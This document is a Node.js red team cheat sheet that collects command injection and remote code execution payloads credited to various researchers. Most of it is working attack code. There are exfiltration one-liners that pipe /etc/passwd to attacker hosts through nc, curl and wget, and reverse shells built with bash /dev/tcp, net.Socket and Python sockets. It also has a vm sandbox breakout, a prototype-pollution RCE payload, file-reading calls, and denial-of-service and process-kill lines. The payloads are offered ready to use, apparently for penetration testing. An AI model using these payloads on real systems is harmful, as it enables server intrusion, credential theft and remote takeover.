NodeJS Red Team Cheat Sheet
A curated list of NodeJs Command Injection / RCE Payloads.
Know the evil functions
eval()
,setTimeout()
,setInterval()
, Function()
, unserialize()
Know your weapons
fs
, child_process
, net
, http
spawn
= returns a stream, returns huge binary data to Node
exec
= returns a buffer, should be used to return status
Attack Vectors
Denial of Service
while(1)
Exit the running process
process.exit()
Kill Process
process.kill(process.pid)
Read current working directory
res.end(require('fs').readdirSync('.').toString())
Read previous directory
res.end(require('fs').readdirSync('..').toString())
Read file
res.end(require('fs').readFileSync(fname))
Spawn Magic ( by @aaditya_purani)
require('child_process').spawn('ls',['-a']).stdout.on('data', function (data) {console.log('own'+ data); });
Child exec ( by @artsploit )
require('child_process').exec('cat+/etc/passwd+|+nc+attackerip+80')
require('child_process').exec('bash+-c+"bash+-i+>%26+/dev/tcp/nc_host/nc_port+0>%261"')
require('child_process').exec('curl+-F+"x=`cat+/etc/passwd`"+attackersip.com')
Wget post data (by @brutelogic)
require('child_process').exec('wget+--post-data+"x=$(cat+/etc/passwd)"+HOST')
Using net (by ibreak.software)
var+net+=+require("net"),+sh+=+require("child_process").exec("/bin/bash");var+client+=+new+net.Socket();client.connect(80,+"attackerip",+function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});
Using arguments[1] as response object (by @OrhanAlbay)
arguments[1].end(require('child_process').execSync('whoami'))
arguments[1].end(require('child_process').execSync('cat /etc/passwd'))
Bypass stream limits by compressing to gzip (by @aaditya_purani)
const pwn=require('zlib').createGzip();const inx=require('fs').createReadStream('app.json');const oux = require('fs').createWriteStream('unrestrictive.gz');inx.pipe(pwn).pipe(oux)
Sandbox Bypass spawnSync (by netspi)
var resp = spawnSync('python',
['-c',
'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("127.0.0.1",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
]
);
print(resp.stdout);
print(resp.stderr);
vm module breakout (by pwnisher)
"use strict";
const vm = require("vm");
const xyz = vm.runInNewContext(`const process = this.constructor.constructor('return this.process')();
process.mainModule.require('child_process').execSync('cat /etc/passwd').toString()`);
console.log(xyz);
Alternative RCE payload (by mahmoud)
x = ''
myToString = x.toString.bind("console.log(process.env)")
myToStringArr = Array(myToString)
myToStringDescriptor = Object.getOwnPropertyDescriptor(myToStringArr, 0)
Object.defineProperty(Object.prototype, "toString", myToStringDescriptor)
Object.constructor("test", this)()
Need More ?
Repository would be maintained time to time. Feel free to contribute.